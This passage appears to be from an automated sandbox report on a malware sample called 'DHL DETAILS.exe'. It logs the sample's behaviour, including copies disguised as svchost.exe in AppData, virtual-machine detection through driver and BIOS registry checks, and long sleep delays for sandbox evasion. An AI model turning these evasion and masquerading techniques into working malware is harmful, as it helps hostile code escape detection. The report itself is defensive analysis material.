                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\DHL DETAILS.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\DHL DETAILS.exeMemory allocated: 28F62430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeMemory allocated: 28F7BD90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 17745D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1775F7A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 143DCBD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 143F4BD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 23776360000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 23777DA0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1550000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EF0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4EF0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1C6B03F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1C6C83F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeMemory allocated: 1730000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeMemory allocated: 31E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeMemory allocated: 51E0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1280000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C50000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4C50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeMemory allocated: 15E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeMemory allocated: 30D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeMemory allocated: 2F00000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 2510000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 2510000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\DHL DETAILS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\DHL DETAILS.exeWindow / User API: threadDelayed 4425Jump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeWindow / User API: threadDelayed 1050Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1099Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 5790
                Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 2332
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2033
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 501
                Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1452
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1536
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1170
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99764s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99544s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99293s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -99078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98965s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98763s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98655s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98325s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98202s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -98091s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -97980s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -97866s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exe TID: 2584Thread sleep time: -97749s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2800Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -99704s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -99593s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -99375s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -99098s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -98905s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -98737s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -98472s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -98328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -97515s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -97166s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -97031s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -96899s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -96791s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -95453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -94906s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -91515s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -90755s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -90625s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -90497s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -90387s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -90259s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -90136s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -89791s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -76875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -73312s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -70937s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -67375s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -64718s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -62625s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -55468s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -53125s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -48375s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -46000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -43625s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -41329s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -38954s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -36579s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -34204s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -31829s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43472Thread sleep count: 5790 > 30
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99872s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99646s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99525s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99405s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99295s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99184s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -99068s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98938s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98822s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98717s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98608s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98467s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98354s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -98156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97995s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97888s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97768s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -97082s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43456Thread sleep count: 90 > 30
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -96960s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -96828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -96716s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 43448Thread sleep time: -96543s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24312Thread sleep count: 2332 > 30
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99843s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99714s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99606s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99370s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99223s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -99093s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98961s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98790s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98667s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98384s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98274s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -98119s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -97965s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -97738s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -97531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -97375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -96814s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -96623s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -94781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -94594s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -94441s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -94234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -94021s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -93844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -93730s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -93604s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -93498s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -93383s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -93047s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -92888s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -92701s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -92469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -92328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -92166s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -92000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -91867s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -91672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -91531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -91391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -91234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -91068s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -90931s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -90746s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -90624s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -90463s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -90334s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -90156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89955s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89817s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89688s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89536s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89398s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89209s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -89039s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -88766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -88618s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -88468s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -88219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -88070s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -87947s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -87759s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -87531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -87414s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -87234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -87000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -86859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -86719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -86406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -85703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -85216s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -85090s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -84906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -84749s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -84172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -84009s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -83859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -83688s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -83557s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -83410s >= -30000s
